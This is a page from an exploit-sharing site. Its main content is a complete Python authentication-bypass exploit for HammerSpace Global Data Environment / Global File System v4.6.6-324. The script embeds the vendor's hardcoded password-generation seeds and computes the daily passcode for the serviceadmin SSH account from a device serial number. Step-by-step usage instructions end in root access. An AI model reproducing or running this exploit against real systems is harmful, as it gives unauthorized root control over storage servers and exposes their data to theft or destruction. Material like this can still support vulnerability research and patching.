0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HammerSpace GDE / GFS 4.6.6-324 Authentication Bypass Exploit
[# Affected Product: HammerSpace Global Data Environment / Global File System -
# https://hammerspace.com/product
#
# Affected Versions: v4.6.6-324 and below with default installation/configuration.
#
# Vendor Notified: Yes, sometime between: 08/2022 and 10/2022, confirmed 2023-03-21 there is a fix in
# an upcoming release
#
# Description:
#
# A utility that can generate the TOTP passcode used to sign In as the support service
# account user for HammerSpace GFS default installations. Both the OVA and ISO are effected.
#
# To utilize:
#
# 1. Attempt SSH login to a HammerSpace Anvil or Data Server and make note of the System S/N
# 2. Generate the password of the day for the service admin account:
# ./hsps-passgen.py —serials SERIALNUMBER
# 3. SSH as the service admin account to the server and specify the outputted TOTP passcode
# 4. Enjoy root
#
#
#!/usr/bin/env python3
import argparse, getpass, os, random, string, sys
from datetime import datetime
from random import Random
#make it python3 compatible thanks for changing random guys!
class HSRandom(Random):
def seed(self, seed):
if sys.version_info[0] == 3:
return super(HSRandom,self).seed(seed,version=1)
else:
return super(HSRandom,self).seed(seed)
def choice(self, seq):
if sys.version_info[0] == 3:
"""Choose a random element from a non-empty sequence."""
return seq[int(super(HSRandom,self).random() * len(seq))] # raises IndexError if seq is empty
else:
return super(HSRandom, self).choice(seq)
VERSION = "hspc-passgen v4.3.2"
USAGE_DESC = "No help."
PARSER = argparse.ArgumentParser(prog="hspc-passgen", description="Generates time of day passcode for serviceadmin account used by Hammerspace")
PARSER.add_argument("-V", "--version", action="store_true", help="Prints version")
PARSER.add_argument("--debug", action="store_true", help="Debug Output")
PARSER.add_argument("--pwtype", type=int, default=3, choices=[2,3], help="Password type")
PARSER.add_argument("--datecode", type=str, default=datetime.now().strftime("%F"), help="Date Code")
PARSER.add_argument("--serials", type=str, nargs="+", required=True, help="Reported serial number(s) from ssh: serviceadmin@host")
ARGS = PARSER.parse_args()
def exc_handler(exception_type, exception, traceback, debug_hook=sys.excepthook):
if ARGS.debug:
debug_hook(exception_type, exception, traceback)
else:
print("%s: %s" % (exception_type.__name__, exception))
sys.exit(1)
sys.excepthook = exc_handler
def generate_password_v2(seed_str, _, length=8):
"""Generate a simple password seeded with supplied text"""
serial = seed_str[-5:].lower()
collapsed = ("").join(disambiguate(x) for x in serial)
chars = string.digits
seed = "<~^~^~^Mr.Oftal_P^~^~^~>" + collapsed
hs_random = HSRandom(seed)
return ("").join(hs_random.choice(chars) for i in range(length))
def generate_password_v3(seed_str, datecode, length=10):
"""Generate a stronger password seeded with supplied text"""
serial = seed_str[-8:].lower()
collapsed = ("").join(disambiguate_v3(x) for x in serial)
chars = string.digits
seed = datecode + "z97eoW8tVn3daG833DN83wY8" + collapsed
hs_random = HSRandom(seed)
return ("").join(hs_random.choice(chars) for i in range(length))
def generate_password(seed_str, datecode, pwtype=3):
return globals()[("generate_password_v" + str(pwtype))](seed_str, datecode)
def disambiguate(char):
"""Substitute ambiguous characters with non-ambiguous ones"""
char = str(char)
if char in ("1", "I", "!", "|"):
dis = "l"
elif char in ("D", "Q", "O", "0"):
dis = "o"
elif char in ("3", "B", "8", "6"):
dis = "b"
elif char in ("5", "S", "$"):
dis = "s"
elif char in ("A", "4"):
dis = "a"
elif char in ("V", "U"):
dis = "u"
elif char in ("M", "W"):
dis = "m"
elif char in ("C", "("):
dis = "c"
else:
dis = char
return dis
def disambiguate_v3(char):
"""Substitute ambiguous characters with non-ambiguous ones"""
char = str(char)
if char in ("L", "1", "I"):
dis = "l"
elif char in ("Q", "O", "0"):
dis = "o"
elif char in ("B", "8"):
dis = "b"
elif char in ("5", "S"):
dis = "s"
elif char in ("V", "U"):
dis = "u"
else:
dis = char
return dis
def main():
if ARGS.version:
print(VERSION)
return 0
if ARGS.pwtype not in (2, 3):
print("\nERROR: Invalid parameters.\n")
PARSER.print_help()
return 1
if ARGS.serials is None or len(ARGS.serials) == 0:
print("\nERROR: Invalid parameters.\n")
PARSER.print_help()
return 1
print("SERIAL - PASSCODE")
for serial in ARGS.serials:
print(f"{serial} - {generate_password(serial, datecode=ARGS.datecode, pwtype=ARGS.pwtype)}")
if __name__ == "__main__":
sys.exit(main())
# 0day.today [2024-06-27] #